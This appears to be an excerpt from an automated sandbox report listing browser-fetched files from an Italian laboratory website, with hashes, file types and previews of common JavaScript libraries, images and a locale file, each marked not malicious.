                                                                                                                                          Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.ap
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32007)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):50225
                                                                                                                                          Entropy (8bit):5.115807109499237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:v1qQW+y4BILGJD222GpOKF3LGqZp13MJxuI4sRj39hJhHPcoklCJAM2yvAQgzJ:TKVwOKFk39hJmoVgV
                                                                                                                                          MD5:A0C1CD695B9FCE60789EBE184B7F4858
                                                                                                                                          SHA1:0DF74759ED146A50FEFA900E717D3AD49A666C2B
                                                                                                                                          SHA-256:6D5111475E8E0B9EC51CB0C4694DAA0EEA6A58BDF006FB80674995A664404D7D
                                                                                                                                          SHA-512:98306B2455FE90C31D9B368C019844DAA496F8ACC01BE6A6BDCA15FB777FBFDC035A1F3B4A55055D15558D9B48B381DB82276A69A81BD911C7FA368EEBC8CD96
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:(function(factory){"use strict";if(typeof define==="function"&&define.amd){define(["jquery"],factory)}else if(typeof exports!=="undefined"){module.exports=factory(require("jquery"))}else{factory(jQuery)}})(function($){"use strict";var Slick=window.Slick||{};Slick=function(){var instanceUid=0;function Slick(element,settings){var _=this,dataSettings;_.defaults={accessibility:true,adaptiveHeight:false,appendArrows:$(element),appendDots:$(element),arrows:true,asNavFor:null,prevArrow:'<button type="button" data-role="none" class="slick-prev" aria-label="Previous" tabindex="0" role="button">Previous</button>',nextArrow:'<button type="button" data-role="none" class="slick-next" aria-label="Next" tabindex="0" role="button">Next</button>',autoplay:false,autoplaySpeed:3e3,centerMode:false,centerPadding:"50px",cssEase:"ease",customPaging:function(slider,i){return $('<button type="button" data-role="none" role="button" tabindex="0" />').text(i+1)},dots:false,dotsClass:"slick-dots",draggable:true,e
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14181)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):14265
                                                                                                                                          Entropy (8bit):5.155891752872181
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:EOuDc2EytQAYZFPg9HN46W/rI9kWkaFaKYS6STFuT9eei:E6rD/rI9kqa66cFuT9e1
                                                                                                                                          MD5:2EBF0D88E73A9C8D5E6D55A1A1CECA01
                                                                                                                                          SHA1:962359C8CD63A3F8436171AD46D97D9F29ABAC4D
                                                                                                                                          SHA-256:2B26394AAC8199778CD337D8046535B6EA9CB2DC698E4102029CA963E080E19F
                                                                                                                                          SHA-512:AAE1C2A7759B04D9302DF61431DF8AC01020A55BA426EE4C9DCB906965E00AB7E073108902AFDFA3EA2AAD128E8FE50A126C8C086DED6FC441EB75BE126ACE06
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.0/axios.min.js
                                                                                                                                          Preview:/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(22),u=n(10),c=r(u);c.Axios=s,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefined"==typeof e}functi
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):80
                                                                                                                                          Entropy (8bit):4.519265602280304
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YKOHcWnyKBAHfXHyUNskUQ9WeUAdRNn:YKOHnyaiftOkUgzTN
                                                                                                                                          MD5:3FA187421B5A45709B21C348556B4A6A
                                                                                                                                          SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                                                                                                                                          SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                                                                                                                                          SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (5342)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5504
                                                                                                                                          Entropy (8bit):5.308660839803039
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:4NcM4y2jLx3bovPjMrgxkGGvCi1HBN7c3QESI+6PCv73E6ElB/:eF2PtrrGkGGvC6h9c3gI+iCv73EHlB
                                                                                                                                          MD5:BDF2E96352A6F039C6B045FD4CD4D082
                                                                                                                                          SHA1:56300B48DE913C866C723AA2520588918499FC4A
                                                                                                                                          SHA-256:3DF1F0A646C3020B4E27EAF7E983AAC4FF3D1D65BFCB94F0831F5CD5B1D11DC3
                                                                                                                                          SHA-512:D2F5514DDF0FAC64FC030D8228530AA20CC073C814B39BB2141388669D110AD3A66367BD703277CBF7AC157A03409E40599593F3D178FFB84CA0743115E5E8CE
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed-setclasses !*/.!function(e,n,t){function r(e,n){return typeof e===n}function s(){var e,n,t,s,i,o,a;for(var f in C)if(C.hasOwnProperty(f)){if(e=[],n=C[f],n.name&&(e.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(t=0;t<n.options.aliases.length;t++)e.push(n.options.aliases[t].toLowerCase());for(s=r(n.fn,"function")?n.fn():n.fn,i=0;i<e.length;i++)o=e[i],a=o.split("."),1===a.length?Modernizr[a[0]]=s:(!Modernizr[a[0]]||Modernizr[a[0]]instanceof Boolean||(Modernizr[a[0]]=new Boolean(Modernizr[a[0]])),Modernizr[a[0]][a[1]]=s),y.push((s?"":"no-")+a.join("-"))}}function i(e){var n=S.className,t=Modernizr._config.classPrefix||"";if(w&&(n=n.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+t+"no-js(\\s|$)");n=n.replace(r,"$1"+t+"js$2")}Modernizr._config.enableClasses&&(n+=" "+t+e.join(" "+t),w?S
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 245 x 42, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):10409
                                                                                                                                          Entropy (8bit):7.923123662802421
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:ESekn/cUfiLjfWk8y5ZfhuZQbU7wVlM6UeSBzLtLlD8boFHVLCVORr:D1nf6PfWkj7fhuZmXlFmVLybobCV2r
                                                                                                                                          MD5:416FD7832161CB2C15B9EBD838CC398A
                                                                                                                                          SHA1:932A330BC5F3A1123FA6A0E383EDB2B020AF4FC4
                                                                                                                                          SHA-256:87755D3C11A75ECD44E88BD1FD69D5EA06E51995D6C41980DA37B40879837C3B
                                                                                                                                          SHA-512:E4ACE2457B2FCBB20B70004B279C895E849B2068197353508F5F8327225BD33E922DD7E48686ADB8355A38AD72DC2DAA829277F0EA4257CA5BC92261F479F3DC
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2
                                                                                                                                          Preview:.PNG........IHDR.......*.....k.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.4 (Macintosh)" xmp:CreateDate="2021-02-25T14:40:48+01:00" xmp:ModifyDate="2021-07-01T09:59:16+02:00" xmp:MetadataDate="2021-07-01T09:59:16+02:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:99bf15ee-5f20-4225-b931-cb8df5baee34" xmpMM:DocumentID="xmp.did:99bf15ee-5f20-4225-b931-cb8df5baee34" xmpMM:Origi
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):217
                                                                                                                                          Entropy (8bit):5.1508709451178865
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:UhC6j/7NKZTRYrtH3ERAT8wEggqgq/wl/q:Uz77NdG4Cqcl/q
                                                                                                                                          MD5:95E891F28E44A9B314C09545D86BE2B7
                                                                                                                                          SHA1:F9B13A8BD47273B086A0A07DF15F314E0AF0BC3E
                                                                                                                                          SHA-256:5A5F39391FBF5B06DB84B8F9716D53DE575EE97A627D2C5F12F79A991A671EB5
                                                                                                                                          SHA-512:105947A192EC19166AB0D106A357BAC3C4DF7FCF575E4BEFA3002F0F032F80056CABF3AF085DE1F27B177243F7053D624059C7389E90259B9A62D745CBC19289
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-includes/css/classic-themes.min.css?ver=1
                                                                                                                                          Preview:/*! This file is auto-generated */..wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):127200
                                                                                                                                          Entropy (8bit):5.339889537935314
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ji6QC5Igc81k2dvaQggTsnFDg7RJJlwMnF26g36BiDrmLAsBN5t1k:m9gJ1k2rJX2F8A8N6
                                                                                                                                          MD5:DD9377E8833CE1E98FCE9E03BB37FCD5
                                                                                                                                          SHA1:61643141D6CAEAE0097AB2CD465B2F2ABE62D3B0
                                                                                                                                          SHA-256:9A5BA6F2869C06CC803240CA13266CBDBFFDA2EC9096CCDF86C2840F61B20BDE
                                                                                                                                          SHA-512:CD43309831F2D8A695294161F330F54F7974B3E95DB505CE570B350A76CFDBCE9AB1D3D8C173F54DB90386D372690D2BC3FC9E99CED0E7A9D02F793EB3F86D47
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:am4internal_webpackJsonp(["cc1e"],{QJ7E:function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={};n.d(i,"geoArea",function(){return st}),n.d(i,"geoBounds",function(){return te}),n.d(i,"geoCentroid",function(){return pe}),n.d(i,"geoCircle",function(){return Me}),n.d(i,"geoClipAntimeridian",function(){return Ve}),n.d(i,"geoClipCircle",function(){return Re}),n.d(i,"geoClipExtent",function(){return Ye}),n.d(i,"geoClipRectangle",function(){return He}),n.d(i,"geoContains",function(){return fn}),n.d(i,"geoDistance",function(){return rn}),n.d(i,"geoGraticule",function(){return vn}),n.d(i,"geoGraticule10",function(){return mn}),n.d(i,"geoInterpolate",function(){return _n}),n.d(i,"geoLength",function(){return tn}),n.d(i,"geoPath",function(){return Pi}),n.d(i,"geoAlbers",function(){return Vi}),n.d(i,"geoAlbersUsa",function(){return Ri}),n.d(i,"geoAzimuthalEqualArea",function(){return Hi}),n.d(i,"geoAzimuthalEqualAreaRaw",function(){return Wi}),n.d(i,"geoAzimuthalEquid
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (5477)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5629
                                                                                                                                          Entropy (8bit):5.064978927674849
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:PwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:Pwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                                                                                                          MD5:3A56752B736635BF69CB069B8818CBFD
                                                                                                                                          SHA1:42E0951FE74BB3F56A30F51291823BCD4A84D76E
                                                                                                                                          SHA-256:FF4BD34AA98A0214833619D3D751838DB015722DFBBEC15CD14DADC66CD67869
                                                                                                                                          SHA-512:A255D61DE4E6CEC2084AAE0F027CCC0259039AEF62268A27072C8097D348D76BB725CA35563386CEB068387C9AD3AB0E331BD270BA754A38A2A2D33944F305F5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.ap
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):89684
                                                                                                                                          Entropy (8bit):5.290619806745655
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                                          MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                                          SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                                          SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                                          SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                                                                                                                                          Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1600x587, components 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):209711
                                                                                                                                          Entropy (8bit):7.990302169285806
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:3072:JiM+7mXmbcGNKDA4d7297uSZ/4oOMh4f/mIPu6cSl1ii5rkgbiu0pNpEIXfhK1J5:gPcVOZQ/W49l1zV5bi7EIX5K5
                                                                                                                                          MD5:D8BBDF00EFE1C9076CA218B759732A93
                                                                                                                                          SHA1:713E918CE38ED99BBF7C378E7518623B6D6847C7
                                                                                                                                          SHA-256:02F6B392976C9D85761906420741FAB7A7029D3F81B66F729898B64EC0A47421
                                                                                                                                          SHA-512:1E5D7F495BB9A8911481D51AFD848C9B2BF7BF13D463252C4547F31DDE8C99C6FCB5F883DF80F7383429BFF73AFD31256E399F238369544640110C10468EDD8C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg
                                                                                                                                          Preview:......JFIF.............C....................................................................C.......................................................................K.@.....................................................................................'_..*...J....E. .....@0....s....b...3M].....a....*O7p..#..e.....g.m....3bK.fS...B?+R.*....3...MG;:Zn..n[...\....3u..R 8\......v..T.10B.ZP.....r..s.5K...-...]..K.-..9L.j...\0nS;s.n6.|.....U"..V.m.VQ.U......J...."...U.....H..4M22.,hdH.+`..K.V.$..V.?.F8v."..@.0..3..=.<..JhJ....I.I......"m...a........+.bU3J.i.e....0 ......G...Kr...?5...Z.Q.I..H.-..*.{6.j..G-......{...E.U.1....g.f.|........L... ..Ta.a..S.....P.....c..\.5!\.5::.9......Rm..t}f...ZIc.Nd..z^.&5......!P....4..P.4.. ....QnsX.^rf...D.|xZ.0.....8.F"..r..!.M....[...?1v.(.........s........k......H.:....Wjs74H.v=4...CJ...e....80.l5..f.{y..B.D...jn...$....b..*9^.fu/=5|.....G.{f/.d...M..1.s....y.6'...(.6&T.!...)LU*..(50!)..k?.....f1R.......5eX\
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1139
                                                                                                                                          Entropy (8bit):4.690445916117134
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:qOmAJv7uGPTP9xyt2x9RgfpCnzy/rfOc5THFF:1jjZPhxoK9RgfpCnz+B5THFF
                                                                                                                                          MD5:B39E34E4140185252CB005E9C4CD16FA
                                                                                                                                          SHA1:A6EAACF4D7694C1EB935CB6E649064008F7C399D
                                                                                                                                          SHA-256:6CB839F4F44C74B2A104EA18D8FB8A9631E6B0BA42C9D3CED8CE7F6FDE28A9BD
                                                                                                                                          SHA-512:E446CD259A78C12407EF731D6BB0DADA53CEE724A33658BA92AEDE2FA4689FBA17739CDB719D2D4D574AB04AC167E823AB3D3F6B8DCB3FE6F0F9C6F0D3FF6DDA
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147
                                                                                                                                          Preview:{. "COUNTRY": {. "TITLE": "Nazione",. "AT": "Austria",. "BE": "Belgium",. "BG": "Bulgaria",. "CA": "Canada",. "CN": "China",. "CY": "Cyprus",. "DE": "Germany",. "GR": "Greece",. "IN": "India",. "IL": "Israel",. "IT": "Italy",. "JP": "Japan",. "MX": "Mexico",. "NL": "Netherlands",. "PL": "Poland",. "ES": "Spain",. "CH": "Switzerland",. "TR": "Turkey",. "GB": "United Kingdom",. "US": "USA",. "FR": "France". },. "INDUSTRY": {. "TITLE": "Settori Industriali",. "INDUS1": "Food & Feed",. "INDUS2": "Nutraceutical & Supplement",. "INDUS3": "Agriculture & Environment",. "INDUS4": "Agrosciences",. "INDUS5": "Beauty, Wash & Care",. "INDUS6": "Pharmaceutical & Medical",. "INDUS7": "Chemical Industry",. "INDUS8": "Tobacco and Consumer goods". },. "LABSERVICE": {. "TITLE": "Servizi di Laboratorio",. "LABSER1": "Physio Chemical",. "LABSER2": "Instrumental",. "LABSER3": "Microbiology",. "LA
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32030)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):86709
                                                                                                                                          Entropy (8bit):5.367391365596119
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                                                                                          MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                          SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                          SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                          SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):12647
                                                                                                                                          Entropy (8bit):7.976805859641904
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:CcKRdsJhDbU4E9IMG9I0KY7Y6zoc/X1OQwy+:CldAnU69IZYFzJ8QT+
                                                                                                                                          MD5:28E056AF563E5A6599BBACBEA53A3D11
                                                                                                                                          SHA1:B7FA01CADC94C44F4BA12143F9B8D299C3B7F0A7
                                                                                                                                          SHA-256:F45D81F6FC4A9AF7B5477563D89492394AC5008AF3AF8BCEF72CC9D7DC77757B
                                                                                                                                          SHA-512:0EE4523CCE082AAD25AEF8D4ADC1AF0AE7777A10B20714B729B4D95A932E42975F39D97D952D392C19CB782B7A557103521403D064F25F3EB7313D8BF78B6DB8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR.............L\....1.IDATx..}..]E..9Uu.}K.[:Ig.IB.I.a...,.,3*.3....3..(.2...~:. ... !$..d'..v....o..[u...u_71.L.;.7.._.~..u...?..3....8....N.g....3.....p.I.............0........P...h @.d.....@.~R".-0fD.^...<R.w...d.q8...#......S&.........~_mMM......Tw.._`2&..D,..c...y....)..^V^\\..$.()..-....Q............a{u...........n..D.Y!H.p.....DF.......` 8.T...v..?..w..........:.D...D.n..|.r....~k...V......(...1c....P@..hB........e..}y~N..m.....G.. .I/....+./.g]C[.6..C..2.V.d.E(..).).D..y.$.,P.PrQ.....+?..O.&.C...p..q..#...4.. .a...../3.T.Pr_....w..3"\..qe..........R...W}._..l..p...... .h......0.0....Z..._|....`......Pim.....e^.i3.~.k(.JJ{....C.........P\...Z..[w~o.O..y.....F....Q.]...'0...|.3.].'....:z..{ih. .9..1.7Wo....=.zY.n..4*......... D......grI.....d1[.s....@C...F.)..`.c.u.~q_kC.......5.C...~^...$c...r.gF..,b..t..G...\..=xd..P.....?>..%;.kDh.....Cg..U....l..........y....].9n"..G1........d.$.k;.~._<..P.P.n.....N...7.^..0...~8...@
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 300 x 111, 8-bit gray+alpha, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):7011
                                                                                                                                          Entropy (8bit):7.935210982848998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:CxXFQdsu4YBwJBzxdIKKZII9PCa62NKPtafT:YXqsK2bIZ020PtmT
                                                                                                                                          MD5:27196EA6F987680715A40244DDA19B07
                                                                                                                                          SHA1:3027961AD138D2BD7D8D5240B90B038B05886429
                                                                                                                                          SHA-256:A8C5ABCE0B585B75FE9BDCF1F3255F9070A657C8F3ED4BB3FA82EEF54E4DAA9B
                                                                                                                                          SHA-512:57FB64FD046379FBB8E6CBEFB8FC621F2CBFBFD33D1843CDA66803E01BC0CDC0F9BDD97AF6F056930FF276CB273379268F979A3AE9B9B047D4EA6BD88F1D9614
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png
                                                                                                                                          Preview:.PNG........IHDR...,...o.......5....*IDATx..w`.....M....IGA....QC..*E..i*%.B/..j(RE.O. .&>."....,O......,....%...3.{wg...v..3g.1b$..T...........#.,#.,#.,#F.XF.XF.XF...........1`.1`.1`.1b.2b.2b.2b.e.e.e.H6...D#.2.q<N2.."W.z.8z.C.!..D.|...z.*W,.<....f....~..tI`1...#....%.......C.g.1...~..<........4.?.,7}.......C..-.N%*2..".f..U..,..I..l...|....3....5.y|.....].....8..Q.9A^T.....!?K.......[..>.#YD....u..?.X.o.......c;...+.F.!r..".M,}...p..AQ.E..i...5..X{IP2.....{....+.."t.g..>......Km....t.7..y""$8.W.3......j....22...z%j....l..&.~T.!7....W.X..K4.,.Y.T.1.rZ..l._J..@.l....<<.L.|.SM......T.9.M.%Bcm.+..].y.J+......'.Pn..!.Uj.u.f6E...c. g6?.C8......M..[ B+...l=gM...KD.^............"..|.......Ia..y.m...L.k.."...a..t-E..[G./.....{..C...........b~......8n.a<.......Q......r1..Df..%........K...s.r..V....n..1`..M.By...D(.d.",....RNg.........D...L.K.X..y.."T#.....[.r.[..<..m-'..h....f....../k#F..t.&"E.y.....&n..ZR6.`-...I.......
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1350
                                                                                                                                          Entropy (8bit):5.437574579461789
                                                                                                                                          Encrypted:false
